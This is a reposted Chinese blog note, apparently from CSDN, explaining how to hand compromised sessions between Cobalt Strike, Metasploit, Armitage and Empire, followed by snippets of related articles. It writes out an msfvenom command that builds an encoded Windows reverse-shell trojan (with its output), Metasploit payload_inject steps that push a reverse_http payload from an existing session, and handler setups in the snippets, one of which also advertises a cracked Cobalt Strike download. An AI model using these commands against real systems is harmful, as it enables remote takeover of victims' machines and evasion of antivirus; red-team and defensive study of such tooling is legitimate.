cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

最新推荐文章于 2025-08-04 17:28:30 发布
转载 最新推荐文章于 2025-08-04 17:28:30 发布 · 355 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/-qing-/p/11519782.html
文章标签:

#shell #java #数据库

 

 

 

0x01 Metasploit派生shell给Cobaltstrike

生成木马:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytes

 

 

 

msf派生给cs:

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.5.4
msf exploit(payload_inject) > set LPORT 4444
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

 

然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
,并根据metasploit监听配置cobaltstrike的listener

 

 

 

 

 

cs派生给msf:

 

 

 

 

 

 

msf中开启相应的监听:

 
ps:
默认情况下,payload_inject执行之后会在本地产生一个新的handler,
由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置
set DisablePayloadHandler true

如果出现错误,PID does not actually exist,可以设置一下注入进程的pid。set pid 进程号

 

 

 

0x02-Cobaltstrike与Armitage互转shell

首先在armitage中配置一个handler

payload要与cobaltstrike的foreign监听器选择相同协议

 

 

 

Armitage派生shell给cobaltstrike

选择armitage中的会话,右键,Access-->Pss Session

 

 

 

0x03-Cobaltstrike与Empire会话互转

(Empire) > help

Commands
========
agents            Jump to the Agents menu.
creds             Add/display credentials to/from the database.
exit              Exit Empire
help              Displays the help menu.
list              Lists active agents or listeners.
listeners         Interact with active listeners.
reload            Reload one (or all) Empire modules.
reset             Reset a global option (e.g. IP whitelists).
searchmodule      Search Empire module names/descriptions.
set               Set a global option (e.g. IP whitelists).
show              Show a global option (e.g. IP whitelists).
usemodule         Use an Empire module.
usestager         Use an Empire stager.

 

 

 

 

cobaltstrike添加foreign监听器,协议为http

 

 

 

 

empire收到会话

 

转载于:https://www.cnblogs.com/-qing-/p/11519782.html

Cobalt Strike笔记(持续更新)
qq_32445755的博客
03-15 312
Cobalt Strike笔记(持续更新) 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成
csmsf联动
FSecurity的博客
04-26 583
目录 cobalt strike和metasploit联动 1.使用kali、vps来做csmsf(这里我使用的vps是阿里云服务器) 2.xshell连接vps,进入msf使用模块use expsploit/multi/handler 3.如果vps没有metersploit就用命令行下载 github(Installing) 这里我是已经下载好了的 4.在模块里进行设置,我这里使用的IP是阿里云的内网IP(端口随便) 5.记住xshell的防火墙要关闭(这里我的已经关了) 看到绿色标注的“act
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3882
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
CS&MSF联动
kukudeshuo的博客
09-23 463
CS&MSF联动 CS联动MSF 现在CS这边已经成功上线一台主机,需要将这个会话传入MSF CS这边新建一个监听器 然后打开MSF use exploit/multi/handler set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload set lhost 192.168.109.128 set lport 5566 #需要设置成跟CS一样的端口 然后CS这边选择增加会话 然后指定生成的msf监听器即可 可以看
CS + MSF 联动
A_dmin的博客
12-23 1737
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
Cobaltstrike系列教程(十二)CSMSF,Armitage,Empire会话互转
J0o1ey Blog
01-19 2814
0x001-CobaltstrikeMSF会话互转 ①Metasploit派生shellCobaltstrike 首先,你需要拿到一个metepreter会话,本例中session为1 Cobaltstrike的teamserver的ip为8.8...
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
CobaltStrikeMSF联动之CS--MSF
weixin_67729650的博客
10-20 586
(简称CS)是一款美国Red Team开发的渗透测试神器。是一个(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作。
cobalt strike笔记-常用beacon命令.pdf
04-03
在当今网络安全领域,Cobalt Strike 是一款备受关注的渗透测试工具。它主要用于模拟攻击,以便安全专家和渗透测试员可以更好地评估企业的安全防护水平。Cobalt Strike 使用的 Beacon payload 是一种被高级攻击者广泛...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
csmsf联动
inslight的博客
09-22 1145
csmsf联动
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 662
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
cobalt strike(cs)和metasploit(msf)联动
weixin_39251927的博客
05-11 5552
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 2、CS上操作 首先有一个已经建立会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:7777 配置内网穿透 如果msf主机处于
cobalt strike(CS)Metasploit(MSF)联动
最新发布
ranzi.
08-04 352
摘要:本文介绍了CSMSF之间会话移交的两种方法。1) CSMSF:先在CS创建HTTP监听器,MSF配置handler模块(payload、lhost、lport需匹配),待CS会话执行移交命令后,MSF即可捕获会话。2) MSFCS:在CS创建监听器后,通过MSF的payload_inject模块配置相应参数(需禁用payload handler并设置迁移),最终CS可成功监听会话。两种方法均需确保端口、IP和payload类型一致,并可通过netstat验证监听状态。
CobaltStrike系列学习笔记——(一)基础流程
limb0的博客
12-02 2000
CobaltStrike系列学习笔记——(一)基础流程 实验环境 系统 IP地址 服务器 kali 192.168.134.130 靶机 win7 192.168.134.135 CobaltStrike分为服务端和客户端,为了方便操作,本次实验中我们把服务端和客户端部署在同一台主机上。 切换到CobaltStrike所在目录,执行以下命令, 启动服务端: ./tea...
msfcs联动
bring_coco的博客
05-18 2276
环境:kali(192.168.190.128)NATAPP。
MSFCS联动】
一纸荒芜的博客
08-27 3291
msfcs
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 2371
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
细说——CS联动MSF
LainWith的博客
08-06 7503
目录环境准备CS ——> MSFubuntu准备cs客户机器准备msf准备补充MSF ——> CSMSF准备ubuntu-cs准备 网上的文章,写的很简介,看的脑壳疼,自己动手,详实的记录一下学习过程 环境准备 我使用两台vps,一台是kali 52.69.164.3,一台是ubuntu 52.194.218.196​ kali使用msf,ubuntu使用cs服务器,物理机使用cs客户端,虚拟机win7是受害者 CS ——> MSF 简单来说,就是当cs拿到一台主机之后,新增一个用于转发
cobaltstrike4.3 - 最新网络安全渗透测试工具发布
资源摘要信息:"Cobalt Strike是一款网络安全领域的渗透测试工具,最新版本为2021年3月17日发布的4.3版。该工具广泛应用于网络安全专家和渗透测试人员对网络系统进行安全评估和安全漏洞测试。它模拟攻击者的手段来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值